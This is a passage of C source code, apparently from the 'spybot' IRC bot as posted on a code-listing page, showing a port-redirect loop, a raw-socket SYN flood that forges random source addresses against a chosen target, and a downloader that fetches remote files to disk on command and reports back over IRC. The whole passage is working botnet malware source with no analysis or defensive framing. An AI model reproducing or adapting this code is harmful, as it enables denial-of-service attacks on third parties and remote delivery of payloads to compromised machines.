2833 	int addrlen;
2834 	DWORD id;
2835 	while (1) {
2836 		addrlen = sizeof(SockAddr);
2837 		if ((redirectsock_in = accept(threads[num].sock, (SOCKADDR *)&SockAddr,&addrlen)) == INVALID_SOCKET)  
2838 			break;
2839 		info = FALSE;
2840 		CreateThread(NULL, 0, &redirect_io, (LPVOID)num, 0, &id);
2841 		while (info == FALSE) Sleep(5);
2842 	}
2843 	closesocket(threads[num].sock);
2844 	threads[num].id = 0;
2845 	return 0;
2846 }
2847 
2848 
2849 #ifdef SPOOFD_SYNFLOOD
2850 
2851 DWORD WINAPI Spoofd_syn(LPVOID param)
2852 {
2853 	int num = (int)param;
2854 	char chan[250];
2855 	strcpy(chan,sendtochan);
2856 	WSADATA WSAData; 
2857 	SOCKET sock; 
2858 	Spoofdsyn[num].state = 1;
2859 	SOCKADDR_IN addr_in; 
2860 	IPHEADER ipHeader; 
2861 	TCPHEADER tcpHeader; 
2862 	PSDHEADER psdHeader; 
2863 	char sendbuf[512];
2864 	char szSendBuf[60]={0}; 
2865 	BOOL flag; 
2866 	int rect,nTimeOver; 
2867 	unsigned int SpoofingIP=0; 
2868 	DWORD i=0; 
2869 	int Count;
2870 	Count = 0;
2871 
2872 
2873 	if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0) 
2874 	{ 
2875 		strcpy(sendbuf,"WSA startup error");
2876 		goto end; 
2877 	} 
2878 
2879 	if ((sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) 
2880 	{ 
2881 		strcpy(sendbuf,"INVALID_SOCKET");
2882 		goto end;  
2883 	} 
2884 	flag=TRUE; 
2885 	if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR) 
2886 	{ 
2887 		strcpy(sendbuf,"setsockopt error");
2888 		goto end;
2889 	} 
2890 
2891 
2892 	addr_in.sin_family = AF_INET; 
2893 	addr_in.sin_port = htons(Spoofdsyn[num].port); 
2894 	addr_in.sin_addr.s_addr = Spoofdsyn[num].TargetIP; 
2895 
2896 
2897 	ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); 
2898 	ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)); 
2899 	ipHeader.ident=1; 
2900 	ipHeader.frag_and_flags=0; 
2901 	ipHeader.ttl=128; 
2902 	ipHeader.proto=IPPROTO_TCP; 
2903 	ipHeader.checksum=0; 
2904 	ipHeader.destIP=Spoofdsyn[num].TargetIP; 
2905 	tcpHeader.th_dport=htons(Spoofdsyn[num].port); 
2906 	tcpHeader.th_ack=0; 
2907 	tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0); 
2908 	tcpHeader.th_flag=2; 
2909 	tcpHeader.th_win=htons(16384); 
2910 	tcpHeader.th_urp=0;  
2911 	char IP[15];
2912 	while(1) 
2913 	{
2914 		i++;
2915 		Sleep(Spoofdsyn[num].delay);
2916 		memset(IP,0,sizeof(IP));
2917 		sprintf(IP,"%i.%i.%i.%i",rand()%255,rand()%255,rand()%255,rand()%255);
2918  		SpoofingIP=htonl(inet_addr(IP));
2919 		srand(GetTickCount());
2920 		tcpHeader.th_sum=0; // can't be outside the for loop 
2921 
2922 		psdHeader.daddr=ipHeader.destIP; 
2923 		psdHeader.mbz=0; 
2924 		psdHeader.ptcl=IPPROTO_TCP; 
2925 		psdHeader.tcpl=htons(sizeof(tcpHeader)); 
2926 
2927 		ipHeader.sourceIP=htonl(SpoofingIP);
2928 
2929 
2930 		tcpHeader.th_sport=htons((rand() % 1001) + 1000 );//htons(SOURCE_PORT); 
2931 		tcpHeader.th_seq=htons((rand() << 16) | rand()); //htonl(0x1234567 ; 
2932 
2933 		psdHeader.saddr=ipHeader.sourceIP;
2934 		memset(szSendBuf,0,sizeof(szSendBuf));
2935 		memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); 
2936 		memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); 
2937 		tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); 
2938 
2939 		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
2940 		memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); 
2941 		memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); 
2942 		ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); 
2943 
2944 		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
2945 
2946 		rect = sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(struct sockaddr*)&addr_in, sizeof(addr_in)); 
2947 		if (rect==SOCKET_ERROR) 
2948 		{  
2949 			strcpy(sendbuf,"SOCKET ERROR");
2950 			goto end;
2951 		} 
2952 
2953 		Count++;
2954 		if (Count > Spoofdsyn[num].times) break;
2955 	} 
2956 	strcpy(sendbuf,"Spoofd synpackets send");
2957 	end:;
2958 	char buf[512];
2959 	sprintf(buf,"PRIVMSG %s :%s\n\r",chan,sendbuf);
2960 	send(Spoofdsyn[num].sock,buf,strlen(buf),0);
2961 	Spoofdsyn[num].state = 0;
2962 	threads[Spoofdsyn[num].thread].id = 0;
2963 	return 0; 
2964 } 
2965 
2966 #endif
2967 
2968 #ifdef WEB_DOWNLOAD
2969 DWORD WINAPI download(LPVOID param)
2970 {
2971 	SOCKET ircsock;
2972 	ircsock = dcchosts;
2973 	char chan[250];
2974 	strcpy(chan,sendtochan);
2975 	int num = (int)param;
2976 	//we need the address of the server..
2977 	//first part of the url should always be http://
2978 	//we could use InternetOpenUrl but why do it easy if we can do it the hard way :D and its a bit better this way
2979 	char host[250];
2980 	char Rfilename[512];
2981 	memset(Rfilename,0,sizeof(Rfilename));
2982 	memset(host,0,sizeof(host));
2983 	char sendbuf[512];
2984 	char buffer[4096];
2985 	int c,d,p,port;
2986 	BOOL useport = FALSE;
2987 	d=0;
2988 	char tempport[5];
2989 	for (c=7;c<strlen(threads[num].dir);c++,d++)
2990 	{
2991 		if (threads[num].dir[c] == '/') break;
2992 		else if (threads[num].dir[c] == ':') { //not port 80 ?
2993 			p=0;
2994 			useport = TRUE;
2995 		}
2996 		else if (useport) {
2997 			tempport[p] = threads[num].dir[c];
2998 			p++;
2999 		}
3000 		else host[d] = threads[num].dir[c];
3001 	}
3002 	if (useport) { tempport[p] = '\0'; port = atoi(tempport); }
3003 	else port = 80;
3004 	host[d+1] = '\0';
3005 	//next create GET filename string 
3006 	strcpy(Rfilename,"GET ");
3007 	for (d=0;c<strlen(threads[num].dir);c++,d++)
3008 		sendbuf[d] = threads[num].dir[c];
3009 	sendbuf[d+1] = '\0';
3010 	sprintf(Rfilename,"GET %s HTTP/1.1\r\n Accept: */*\r\nAccept-Language: nl\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nHost: %s:%i\r\nConnection: Keep-Alive\r\n\r\n",sendbuf,host,port);
3011 
3012 	HANDLE filehandle;
3013 
3014 	//now lets make a connection and download the shit 
3015 	if ((threads[num].sock = create_sock(host,port)) < 1) {// could not connect
3016 		sprintf(sendbuf,"Error connecting");
3017 		goto end;
3018 	}
3019 	int err;
3020 	send(threads[num].sock,Rfilename,strlen(Rfilename),0);
3021 	memset(buffer,0,sizeof(buffer));
3022 	if ((err = recv(threads[num].sock, buffer, sizeof(buffer), 0)) < 1) { //this is the header we just ignore it
3023 		sprintf(sendbuf,"Error connecting");
3024 		goto end;
3025 	}
3026 	int size = err;
3027 	DWORD byteswriten;
3028 	filehandle = CreateFile(threads[num].file, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_ARCHIVE, NULL);
3029 	if (filehandle == INVALID_HANDLE_VALUE) {
3030 		sprintf(sendbuf,"Error creating local file");
3031 		closesocket(threads[num].sock);
3032 		goto end;
3033 	}
3034 	strtok(buffer,"\r\n\r\n");
3035 	WriteFile(filehandle, buffer, err, &byteswriten, NULL);
3036 	while (err > 0) {
3037 		memset(buffer,0,sizeof(buffer));
3038 		err = recv(threads[num].sock, buffer, sizeof(buffer), 0);
3039 		if (err == 0) { //we hope everything went oke
3040 			sprintf(sendbuf,"file downloaded to %s size: %i",threads[num].file,size);
3041 			break;
3042 		}
3043 		if (err < 0) { //socket error
3044 			sprintf(sendbuf,"socket error");
3045 			break;
3046 		}
3047 		WriteFile(filehandle, buffer, err, &byteswriten, NULL);
3048 		size = size + err;
3049 	}
3050 	CloseHandle(filehandle);
3051 	end:;
3052 	sprintf(buffer,"PRIVMSG %s :%s\n\r",chan,sendbuf);
3053 	send(ircsock,buffer,strlen(buffer),0);
3054 	threads[num].id = 0;
3055 	return 0;
3056 }
3057 #endif


Comments

blog comments powered by Disqus

Keywords: spybot 60e29751634c36ca26fd6acef4d9554e